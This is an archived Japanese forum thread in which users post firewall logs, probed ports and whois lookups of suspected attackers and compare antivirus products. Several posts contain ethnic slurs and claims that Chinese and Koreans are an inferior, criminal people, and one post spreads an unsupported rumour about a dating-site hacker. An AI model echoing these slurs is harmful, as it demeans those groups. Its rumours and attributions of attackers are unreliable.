NetHandle: NET-66-118-128-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.SAGONET.COM
NameServer: NS2.SAGONET.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-06-05
Updated: 2002-11-11

TechHandle: ZS203-ARIN
TechName: Sago Networks
TechPhone: +1-866-510-4000
TechEmail: ipadmin@sagonet.com

679 :名無しさん?:03/08/23 19:53
ファイアーウォールのログ見たらさ、192.168.0.133ってのからpingすげーdでくるんだけど
うちパソコン1台しかないし、俺の192.168.0.118に固定してるのになぜ?ありえねええええ

680 :名無しさん@お腹いっぱい。:03/08/24 03:43
噂で聞いたんだけど
http://interpals.net/chat.php ていうアメリカの
老若男女出会い系サイトのチャットルームに、凄腕の超が付くレベルの
ハッカーというかクラッカーが昔っから潜伏してるらしいよ。
実際、そいつを怒らせたその一瞬で、ホームページをぶっ壊された人もいるらしい。
出会い系サイトに詳しい外人が言ってたけど、毎日何時でもそこのチャットに
色んな名前で奴が潜んでて、ターゲットを待ってるらしい。
そのハッカーが何人かは不明らしいが、アジアからの人物では無いらしい。
噂では、実はそこのサイトを立てた設立者つまり管理人自身が
クラッカーだという説あった。つまり出会い系サイトを作って
ターゲットをおびきよせるってのが魂胆てことかな。
なんかアジア系はチャットで欧米人などに素直に心を開いて正直に話すことが
多いらしいから狙われやすいとも言ってた。気をつけたほうがいいよ。
そいつを打ちのめせるほどの凄腕日本人ハッカーの方は
http://www.interpals.net/chat.php で奴を見つけるといいかも。
マジで正体が管理人とか設立者だったら恐いね。奴に日本からの
アクセスだとばれたら攻撃されるかもしれないから注意してね。
外人もそこには二度と行かないって言ってたぐらいだから。

681 :名無しさん@お腹いっぱい。:03/08/30 16:23
66.135.74.* の奴が総計500回ばかりのsyn floodを仕掛けてきた。
ただIPはフェイクだろうからなぁ…。


682 :あぼーん:あぼーん
あぼーん

683 :名無しさん@お腹いっぱい。:03/08/31 00:20
>>679
ping撃ち返せ!

684 :名無しさん@お腹いっぱい。:03/08/31 02:18
うわぁ、スゲー
俺のPCにガンガンしかけてくる奴が一人いるよ
それも、もう、1ヶ月以上同じIPのままなの
今ウイルスバスターの体験版のFWのおかげでどうにかなってるけど
体験期間すぎたらどうなっちゃうんだろうか・・・・

685 :名無しさん@お腹いっぱい。:03/08/31 05:10
USA お馬さん

CANDA お馬さん

CHINA お馬鹿さん

  贈ってクナ!

686 :名無しさん@お腹いっぱい。:03/09/03 17:18
スパイウェアは?

687 :名無しさん@お腹いっぱい。:03/10/18 06:05
218.235.23.193
NetBus
糞チョソは地上から消えろ

688 :名無しさん@お腹いっぱい。:03/10/26 21:47
Backdoor Subseven
ヤンキーの糞ガキ氏ね

67.64.145.68
CustName: PPPoX pool Rback13 RCSNTX
Location: Richardson, TX, USA
NodeName: ppp-67-64-145-68.dialup.rcsntx.swbell.net
Address: 2701 W 15th ST pmb 236
City: Plano
StateProv: TX
PostalCode: 75075
Country: US
RegDate: 2002-09-25
Updated: 2002-09-26

NetRange: 67.64.144.0 - 67.64.151.255
CIDR: 67.64.144.0/21
NetName: SBCIS-092502131256
NetHandle: NET-67-64-144-0-1
Parent: NET-67-64-0-0-1
NetType: Reassigned
Comment:
RegDate: 2002-09-25
Updated: 2002-09-26


689 :名無しさん@お腹いっぱい。:03/12/03 06:03
202.172.40.13
invalid ICMP Code
不正侵入を検出しました

inetnum: 202.172.40.12 - 202.172.40.15
netname: CLLS-NETWORK
descr: Chong Lee Leong Seng Pte Ltd
descr: 23 Tuas Ave 2
descr: Singapore.
country: SG
admin-c: SC378-AP
tech-c: SK224-AP
mnt-by: MAINT-SG-GWNET
changed: suresh@gwnnet.net 20020323
status: ASSIGNED NON-PORTABLE
source: APNIC
changed: hm-changed@apnic.net 20020827

なんだこりゃ?

690 :名無しさん@お腹いっぱい。:03/12/10 15:55
このスレの方々に尋ねたいのだが
pingとかポートスキャンぐらいで騒ぐ必要在るのか?(おもしろがってるだけ?)
ポートスキャンされたって脆弱性のあるポートが開いてなけりゃ何も出来ないんじゃないの?

$ nmap localhost
Port State Service
22/tcp open ssh
631/tcp open ipp
6000/tcp open X11

で、これらのポートはルータでWANからのパケットをはじくようにしているのだが、
ポートスキャンしたところで何ができるというのか。


691 : :03/12/19 13:01
お前らさどんな仕事してるのよ?
毎日ハッキング受けるやつとかって何処でそんな恨み買ったんだw

692 :名無しさん@お腹いっぱい。:03/12/20 22:53
>691 恨み買われるようなことどうこうより、脆弱性マシンを探してるんだよ。
   DDoSようのゾンビ作りとかさ。

>690 僕も昔は攻撃受けたときは騒ぎましたよw。
   なんか新鮮味があるじゃないですか。
   ポートスキャンしたところで何ができるというのか。→結果
   脆弱性が見つかる場合がある。そしたらクラックできるじゃん!
   すべてのインターネットユーザーがあなたのような対策をとってるわ
   けではないことをご存知でしょ?

693 :名無しさん@お腹いっぱい。:03/12/22 20:04
pts/0 106.cta.ew.ro Sun Dec 21 03:09 - 03:15 (00:06)
ルーマニアからアタックされていた模様。

694 :名無しさん@お腹いっぱい。:03/12/22 20:55
今日 朝起きたら ルーターの設定が初期化されてた・・・・・やられたのか?w

695 :名無しさん@お腹いっぱい。:03/12/23 00:12
あのさー、ノートンで頻繁に最新パターン更新とウイルスチェックしていても
IEのバージョンが古くてしかもウプデートを全くしてないマシンっていうのは
ファイアーウォールが作動していても、穴突けば簡単に侵入出来る?
教えてエライハカー!

696 :名無しさん@お腹いっぱい。:03/12/23 10:41
>>695
ノートン先生を過信するな。
ノートン先生は自己防衛した上での保険。

697 :名無しさん@お腹いっぱい。:03/12/23 17:52
>>695
そんな心配よりIEバージョンアップしたほうがよいぞ。

698 :名無しさん@お腹いっぱい。:03/12/24 22:57
test

699 :あぼーん:あぼーん
あぼーん

700 :port 1434??????:03/12/27 17:26
2003-12-27 14:53:57
14:23:2814:24:0115:02:5215:03:35
15:26:1816:41:01

68.248.25.32 211.92.109.72
61.32.128.248 61.222.31.117
219.120.98.198 211.147.22.98
127.0.0.1 127.0.0.1
127.0.0.1 200.218.171.41
127.0.0.1 127.0.0.1
67.80.238.124 210.15.58.61
217.165.104.41 218.238.25.104

LAN(UDP,port 53) LAN(TCP,port 21)
LAN(TCP,port 3389)LAN(TCP,port 25)
LAN(UDP,port 1434)LAN(TCP,port 21)
LAN(TCP,port 1196)LAN(TCP,port 1188)
LAN(TCP,port 1328)LAN(TCP,port 443)
LAN(TCP,port 1697)LAN(TCP,port 1457)
LAN(TCP,port 17300)LAN(UDP,port 1434)
LAN(TCP,port 1433)LAN(TCP,port 4899)


701 :名無しさん@お腹いっぱい。:03/12/27 19:56
age

702 : :03/12/31 02:09
DateTime From IP To Port
[2003-12-30 22:11:09] | [172.176.224.104] | [1433]
[2003-12-30 22:16:10] | [210.13.22.79] | [1434]
[2003-12-30 22:36:21] | [66.168.165.226] | [17300]
[2003-12-31 00:50:41] | [210.77.60.230] | [21]

703 :名無しさん@お腹いっぱい。:03/12/31 09:12
すいません、クラックなんて一度も仕掛けられたことありませんよ。
この板の人達はよっぽどセキュリティが甘く、知識がないんでしょうねw

704 :名無しさん@お腹いっぱい。:03/12/31 12:39
>>703はどう接続したらポートスキャンを受けないんだろうか。

705 :名無しさん@お腹いっぱい。:04/01/01 17:05
>>704
禿同

706 :名無しさん@お腹いっぱい。:04/01/03 10:15
>>704
> >>703はどう接続したらポートスキャンを受けないんだろうか。

ポートスキャン=クラックは全然違うだろ!
ハック&クラックの意味くらい知れ!


707 :名無しさん@お腹いっぱい。:04/01/03 11:12
スレタイはクラックをしかけてくるだが。

708 :名無しさん@お腹いっぱい。:04/01/03 16:53
おー ゆー きゃんしー

709 :901って何だ!!!!!!!!!!!:04/01/06 15:22

DateTime From IP To Port
[2004-01-05 20:14:28] | [217.169.123.180] | [6129]
[2004-01-05 20:36:06] | [24.67.36.28] | [901]
[2004-01-05 21:04:05] | [210.221.194.8] | [17300]
[2004-01-05 21:05:17] | [68.196.130.95] | [901]
[2004-01-05 21:38:49] | [211.162.238.237] | [20168]
[2004-01-05 21:41:29] | [202.239.72.3] | [1434]
[2004-01-05 21:50:13] | [61.42.98.178] | [901]
[2004-01-05 23:20:58] | [221.141.91.162] | [901]
[2004-01-05 23:31:52] | [12.163.92.49] | [901]
[2004-01-06 00:12:28] | [195.97.90.217] | [6129]
[2004-01-06 00:58:11] | [138.89.43.83] | [1080]


710 :名無しさん@お腹いっぱい。:04/01/08 19:49
>704
引き篭もる

711 : :04/01/11 21:03

DateTime From IP To Port
[2004-01-10 21:29:39] | [213.176.11.12] | [6129]
[2004-01-10 22:00:32] | [68.194.26.215] | [27374]
[2004-01-10 22:22:19] | [68.185.166.109] | [1434]


712 :名無しさん@お腹いっぱい。:04/01/12 01:51
63.123.248.60
このIPどこの国のものだろう?
こいつからポートスキャンかけられまくり。

713 :名無しさん@お腹いっぱい。:04/01/14 02:11
IPから地域特定する方法教えてホスィ・・(´・ω・`)

714 :名無しさん@お腹いっぱい。:04/01/14 02:13
>>713
がんばる

715 :名無しさん@お腹いっぱい。:04/01/14 02:20
web検索しかないのね(´・ω・`)

716 :名無しさん@お腹いっぱい。:04/01/14 04:25
糞スレかつアホが多いためsage進行でたのむ

717 :名無しさん@お腹いっぱい。:04/01/14 04:37
うちは、エロサイトめぐりが多いせいか、1位アメリカ、2位メキシコ。
NISのトラッキングで、必ず追うことにしている。
このあいだ、ベラルーシと、リトアニア、というのがあって、少し嬉しかったりした。

718 :名無しさん@お腹いっぱい。:04/01/14 06:35
>717
チュニジアと言うのがあった
一度NorthKoreaと表示されたけど・・・・
((((((;゚Д゚))))))ガクガクブルブル

719 :名無しさん@お腹いっぱい。:04/01/14 14:22
最近オーストラリアが多い

720 : :04/01/15 19:43
DateTime From IP To Port
[2004-01-13 20:05:24] | [64.231.8.218] | [6129]
[2004-01-13 20:36:08] | [211.248.2.220] | [20168]
[2004-01-13 20:48:12] | [202.108.249.51] | [1434]
[2004-01-14 00:01:20] | [221.224.7.98] | [17300]
[2004-01-13 20:54:11] | [219.130.49.148] | [17300]
[2004-01-13 20:56:08] | [218.247.11.28] | [17300]
[2004-01-13 20:57:30] | [218.72.102.123] | [17300]
[2004-01-13 21:02:49] | [137.189.251.185] | [1434]
[2004-01-13 21:35:20] | [218.220.156.88] | [20168]
[2004-01-13 22:43:28] | [159.149.87.97] | [17300]
[2004-01-13 22:55:48] | [218.108.207.113] | [17300]
[2004-01-13 22:56:29] | [211.216.79.2] | [1080]
[2004-01-13 23:07:27] | [218.108.150.92] | [17300]
[2004-01-13 23:12:02] | [218.25.200.13] | [21520]
[2004-01-13 23:42:15] | [218.109.215.11] | [17300]
[2004-01-13 23:45:13] | [194.54.33.52] | [17300]
[2004-01-14 00:03:30] | [65.28.48.248] | [901]
[2004-01-14 00:10:07] | [218.57.8.39] | [3389]
[2004-01-14 00:11:25] | [64.70.39.24] | [1434]
[2004-01-14 00:29:44] | [68.164.53.30] | [17300]
[2004-01-14 00:47:55] | [217.164.251.125] | [901]

721 :素人:04/01/16 11:34
いいなあーここ。。
みなさん 海外旅行にいった気分になってるような・・
楽しそうだね。


722 :若葉:04/01/19 04:16
ドメイン 207.68.178.239

OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US

NetRange: 207.68.128.0 - 207.68.207.255
CIDR: 207.68.128.0/18, 207.68.192.0/20
NetName: MICROSOFT-CORP-MSN-BLK
NetHandle: NET-207-68-128-0-1
Parent: NET-207-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.CP.MSFT.NET
NameServer: DNS2.CP.MSFT.NET
NameServer: DNS1.TK.MSFT.NET
NameServer: DNS1.DC.MSFT.NET
NameServer: DNS1.SJ.MSFT.NET
Comment:
RegDate: 1996-03-26
Updated: 2003-01-15

TechHandle: ZM39-ARIN
TechName: Microsoft
TechPhone: +1-425-936-4200
TechEmail: noc@microsoft.com


723 :若葉:04/01/19 04:17
すみません、ちょっと聞きたいんですが
これよくログのこっているんですけどなんでしょうか?


724 :名無しさん@お腹いっぱい。:04/01/19 16:24
安芸

725 : :04/01/21 00:13

DateTime From IP To Port
[2004-01-18 21:44:15] | [219.157.124.53] | [20168]
[2004-01-18 21:48:46] | [66.91.230.225] | [1434]
[2004-01-18 21:57:38] | [202.108.249.21] | [1434]
[2004-01-18 22:24:06] | [66.210.104.209] | [6129]
[2004-01-18 23:09:03] | [138.88.164.189] | [17300]
[2004-01-18 23:16:03] | [63.229.213.144] | [901]
[2004-01-18 23:55:53] | [67.170.33.73] | [1434]
[2004-01-19 00:04:28] | [200.62.10.8] | [1434]
[2004-01-19 00:09:11] | [211.223.197.68] | [3389]
  

726 :17300って何?:04/01/24 01:34
[2004-01-23 22:19:49] | [61.247.228.104] | [17300]
[2004-01-23 22:52:52] | [61.153.216.10] | [17300]
[2004-01-23 23:16:19] | [218.88.102.29] | [17300]
[2004-01-23 23:26:05] | [218.253.150.197] | [17300]
[2004-01-23 23:45:15] | [61.107.109.180] | [17300]
[2004-01-23 23:50:35] | [203.130.2.251] | [17300]
[2004-01-23 23:50:58] | [218.79.191.200] | [17300]
[2004-01-23 23:53:56] | [63.161.157.121] | [1433]
[2004-01-24 00:11:15] | [61.177.13.96] | [17300]
[2004-01-24 00:14:07] | [218.27.20.134] | [6129]
[2004-01-24 00:25:42] | [202.108.249.51] | [1434]
[2004-01-24 00:30:17] | [206.48.2.84] | [1434]


727 :17300って何?:04/01/24 22:00
   

728 :名無しさん@お腹いっぱい。:04/01/25 22:38
ここ数日ドイツ在住のPCから攻撃受けてるな。。

729 : :04/01/26 23:01
DateTime From IP To Port
[2004-01-24 20:35:41] | [210.86.205.119] | [27374]
[2004-01-24 20:37:48] | [212.114.233.92] | [1433]
[2004-01-24 21:06:57] | [63.172.126.75] | [443]
[2004-01-24 21:12:22] | [220.74.134.238] | [27374]
[2004-01-24 21:55:04] | [210.13.22.79] | [1434]
[2004-01-24 22:04:54] | [64.163.243.217] | [6129]
[2004-01-25 00:36:18] | [218.104.210.132] | [6129]
[2004-01-24 22:50:16] | [68.55.109.179] | [6129]


730 : :04/02/09 21:22
DateTime From IP To Port
[2004-02-08 11:33:36] | [202.96.86.37] | [1434]
[2004-02-08 11:59:58] | [68.34.91.126] | [1434]
[2004-02-08 15:41:45] | [66.214.142.102] | [17300]
[2004-02-08 16:25:01] | [66.169.224.229] | [1080]
[2004-02-08 18:04:17] | [64.185.168.190] | [1434]
[2004-02-08 18:08:46] | [62.95.88.4] | [4899]
[2004-02-08 18:52:27] | [216.195.223.122] | [3389]
[2004-02-08 18:52:30] | [216.195.223.122] | [1433]
[2004-02-08 21:55:34] | [219.238.178.206] | [1433]
[2004-02-08 22:28:02] | [24.14.183.82] | [17300]
[2004-02-08 23:25:23] | [61.144.244.39] | [19340]
[2004-02-09 00:16:38] | [63.247.94.210] | [6112]

731 :MyDoom被害者(深刻):04/02/09 21:26
すみません、日本のランキングを上げている一人です。

732 :  :04/02/10 01:11
[2004-02-09 23:26:47] | [81.50.52.240] | [3128]
[2004-02-09 23:26:55] | [81.50.52.240] | [1080]
[2004-02-09 23:26:58] | [80.179.38.61] | [3127]
[2004-02-09 23:34:02] | [68.144.83.224] | [6129]
[2004-02-09 23:45:38] | [219.145.116.152] | [1433]
[2004-02-10 00:04:38] | [62.194.97.117] | [3127]
[2004-02-10 00:23:35] | [65.128.100.50] | [1434]
[2004-02-10 00:24:01] | [67.250.112.240] | [3127]
[2004-02-10 00:38:20] | [141.153.210.249] | [1080]
[2004-02-10 00:39:29] | [218.202.26.36] | [3389]
[2004-02-10 00:39:29] | [218.202.26.36] | [4899]
[2004-02-10 00:39:35] | [218.202.26.36] | [1433]


733 :名無しさん@お腹いっぱい。:04/02/10 02:22
>>723
何のログ?

734 :名無しさん@お腹いっぱい。:04/02/10 18:33
オーストラリア

735 :名無しさん@お腹いっぱい。:04/02/10 18:54
一日のFWのログが数100Mくらいある・・・

736 : :04/02/11 22:42
[2004-02-10 22:50:02] | [151.30.146.171] | [3127]
[2004-02-11 00:01:05] | [81.174.218.155] | [3127]
[2004-02-11 00:20:47] | [211.243.15.109] | [17300]
[2004-02-11 00:24:14] | [211.59.69.78] | [17300]
[2004-02-11 00:33:55] | [205.251.202.166] | [3127]
[2004-02-11 00:38:03] | [200.106.175.135] | [3127]
[2004-02-11 00:58:11] | [203.107.201.188] | [1434]


737 : :04/02/13 11:49
DateTime From IP To Port
[2004-02-12 22:57:19] | [66.143.142.178] | [6129]
[2004-02-12 22:58:19] | [61.63.3.125] | [1433]
[2004-02-12 23:03:46] | [24.58.249.111] | [3127]
[2004-02-12 23:07:05] | [211.232.47.47] | [21]
[2004-02-12 23:35:11] | [68.23.102.133] | [901]
[2004-02-12 23:49:28] | [211.245.28.24] | [17300]
[2004-02-12 23:57:37] | [24.117.71.228] | [17300]


738 : :04/02/16 10:08
DateTime From IP To Port
[2004-02-14 23:32:50] | [24.241.36.89] | [3127]
[2004-02-14 23:50:33] | [195.121.46.101] | [1434]
[2004-02-14 23:58:35] | [208.2.76.210] | [6129]
[2004-02-15 00:05:06] | [210.92.105.25] | [1080]
[2004-02-15 00:14:00] | [24.151.172.208] | [3127]



739 : :04/02/17 21:02
[2004-02-16 23:46:55] | [203.101.14.96] | [3127]
[2004-02-16 23:47:03] | [203.101.14.96] | [3128]
[2004-02-16 23:47:11] | [203.101.14.96] | [1080]
[2004-02-16 23:48:34] | [68.79.203.14] | [17300]
[2004-02-16 23:52:56] | [211.243.213.178] | [4899]
[2004-02-16 23:54:53] | [68.80.36.59] | [901]
[2004-02-17 00:02:09] | [68.40.65.227] | [27374]
[2004-02-17 00:12:27] | [202.115.141.130] | [1325]


740 :名無しさん@お腹いっぱい。:04/02/18 23:03
チョンむかつくよ。また攻撃受けたし。
inetnum: 218.232.179.0 - 218.232.179.127
netname: HANANET-DAELIMINS-DAELIMGANGBYUN-KR
descr: DaelimI&S
descr: Daelim-Gangbyun APT 15 Eungbong-Dong Seongdong-Gu
descr: SEOUL
descr: 133-769
country: KR
admin-c: HS1920-KR
tech-c: HS1921-KR
remarks: This IP address space has been allocated to KRNIC.
remarks: For more information, using KRNIC Whois Database
remarks: whois -h whois.nic.or.kr
mnt-by: MNT-KRNIC-AP
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
changed: hostmaster@nic.or.kr 20040112
source: KRNIC


741 : [3127]:04/02/20 02:21
[2004-02-19 21:42:09] | [82.43.88.158] | [3127]
[2004-02-19 21:48:27] | [207.81.106.63] | [901]
[2004-02-19 21:54:18] | [144.92.40.22] | [901]
[2004-02-19 21:57:58] | [218.84.69.22] | [3127]
[2004-02-19 22:10:18] | [82.65.128.196] | [3127]
[2004-02-19 22:15:59] | [218.88.51.152] | [3127]
[2004-02-19 22:16:14] | [138.89.98.199] | [3127]
[2004-02-19 22:21:25] | [219.130.32.10] | [3127]
[2004-02-19 22:25:41] | [218.69.150.40] | [3127]
[2004-02-19 22:45:31] | [218.190.74.71] | [3127]
[2004-02-19 22:48:31] | [200.222.117.82] | [3127]
[2004-02-19 22:53:53] | [81.203.89.56] | [3127]
[2004-02-19 22:55:02] | [82.142.143.209] | [3127]


742 : [1424]:04/02/23 22:24
[2004-02-22 23:20:04] | [82.129.173.205] | [3128]
[2004-02-22 23:58:45] | [66.74.157.205] | [3127]
[2004-02-23 00:02:18] | [202.108.249.21] | [1434]
[2004-02-23 00:22:38] | [210.237.33.140] | [1434]
[2004-02-23 00:30:13] | [211.28.14.67] | [1434]
[2004-02-23 00:47:12] | [195.68.7.161] | [901]


743 :TCP Flood:04/03/15 00:35
2004-03-15 00:14:29 - TCP Flood - Source:192.168.1.11
,1183,LAN - Destination:61.219.39.25,80,WAN


744 :名無しさん@お腹いっぱい。:04/03/18 17:41
なんでクラックしてくる奴等って中国人とかちょんとか、
ロクでもない国の奴が多いんだか。
いい加減にして戴きたいよ、毎日毎日。っつーか毎時。
今これ書いてる時もCHINANETから攻撃受けてるし。
日本人に対する憎しみやひがみを、こういった形でぶつけるのは
ホントに劣等民族だね。
何も知らん奴がたまに人種差別するなよとか言うけどさ、
犯罪ばっかやってんだから、差別じゃなくて真実なんだよ。
その犯罪国の奴らが抱いている劣等感とやらが余計救いようがなく思えてくるね。
それとも何、こいつらは踏み台なのか?
だとしたら、つい真実を書いてしまったことを詫びるよ。
因みにクラックしてくる奴のランキングは
1.中華人民共和国
2.大韓民国
3.ホングコングとAhoo!BB

AhooBBは個人情報を売られたせいで踏み台になってる可能性のほうが高そうだ。
中国人の手に渡っちまったらおしまいって事さ。

745 :名無しさん@お腹いっぱい。:04/03/25 00:18
中国ウザいんだよ!!!
何なんだよいちいち!!!

CHINANETって悪名高いみたいだね。
中国のプロバイダってCHINANETだけなのかな?

746 :名無しさん@お腹いっぱい。:04/03/25 00:40
>だとしたら、つい真実を書いてしまったことを詫びるよ。

全然詫びてねぇw

747 :名無しさん@お腹いっぱい。:04/03/28 20:22
まただ。

inetnum: 218.144.0.0 - 218.159.255.255
netname: KORNET
descr: KOREA TELECOM
descr: Network Management Center
country: KR
admin-c: DL248-AP
tech-c: GK40-AP

748 :名無しさん@お腹いっぱい。:04/04/02 10:11
203.192.158.195

inetnum: 203.192.158.0 - 203.192.159.255
netname: HANGAME-NETBLK2
country: JP
descr: Hangame Japan, Inc.
descr: Nihombashi-Horidomecho, Chuo-ku, Tokyo

ってところから頻繁にTCP SYN FLOOD攻撃っていうのを受けています。
ハンゲームやってる最中じゃなくて明らかにPC落として寝てる時間にもきてるし。
ここってもしかしてヤバイ会社なのかな。

749 :748:04/04/02 10:21
TCP SYN FLOODでググったら、
自分がなんとなく勘違いをしているような気がしてきた。

750 :名無しさん@お腹いっぱい。:04/04/30 02:11
ああ、それにしても三国人うぜえ
sshの穴なんてふさいでるに決まってんだろうが
個人的にはAPNICが持っているIP全部rejectしてえ・・・

mail.某社.co.jp% jwhois 211.216.53.20
[whois.nic.or.kr]

query: 211.216.53.20

# ENGLISH

KRNIC is not ISP but National Internet Registry similar with APNIC.
Please see the following end-user contacts for IP address information.

IP Address : 211.216.53.0-211.216.53.255
Network Name : KORNET-INFRA000001
Connect ISP Name : KORNET
Connect Date : 20031129
Registration Date : 20031209

[ Organization Information ]
Orgnization ID : ORG1600
Org Name : Korea Telecom
State : GYUNGGI
Address : 206 Jungja-dong, Bundang-gu, Sungnam city, Gyunggi-do, Kore
a, 463-711
Zip Code : 463-711


751 :名無しさん@お腹いっぱい。:04/05/02 01:27
Norton Internet Security 2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
スクリプト遮断機能がある
広告ブロックがアメリカ仕様で、お絵かき掲示板などの画像も消してしまう
スレに貼り付けてあるだけのウイルスコードに反応する
2chの過去ログ取得する時はFWを無効にしないといけない
Antispamが勝手にメーラーと統合する上に不安定(OEと相性が悪い?)
ポップアップ通知が鬱陶しい
LiveUpdateが遅い
webごとにスプリクト遮断やActiveX遮断やプライバシー制御の設定ができる
WEB閲覧するときHTMLファイルにスクリプトを埋め込む処理が重い
 (XPSP2ではデフォルトでポップアップ広告遮断機能があるので無駄になる)
回線速度が遅くなるという報告
ルールが適切ではないとの声もあるがPFWルールの自動作成が進んでいる
不正コピー・不正期限延長ユーザーが多い
個人情報を送ってるかについては疑惑は晴れず。
http://www.symantec.com/region/jp/products/nis/features.html
http://www.symantec.com/region/jp/products/nav/features.html

ウイルスバスター2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
FWレベル高にしないとアプリごとの制御ができない等、おまけ程度
スパイウェアの検出をするが削除は出来ない
迷惑メール検出の判定精度が悪い上に検出しても件名に[MEIWAKU]と付けるだけで意味がない
ユーザー登録しないとウィルス定義をUPできないので不正コピーユーザーは少ない
http://www.trendmicro.com/jp/products/desktop/vb/evaluate/features.htm

FWがしょぼい代わりに不具合が少ないバスターとFWにいろいろと機能が付いてる
代わりに不具合大盛りなNISって感じかな。
どちらもアンチウイルス機能自体には文句が出ないのは例年通り。

http://pc3.2ch.net/test/read.cgi/sec/1067918099/321

255 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)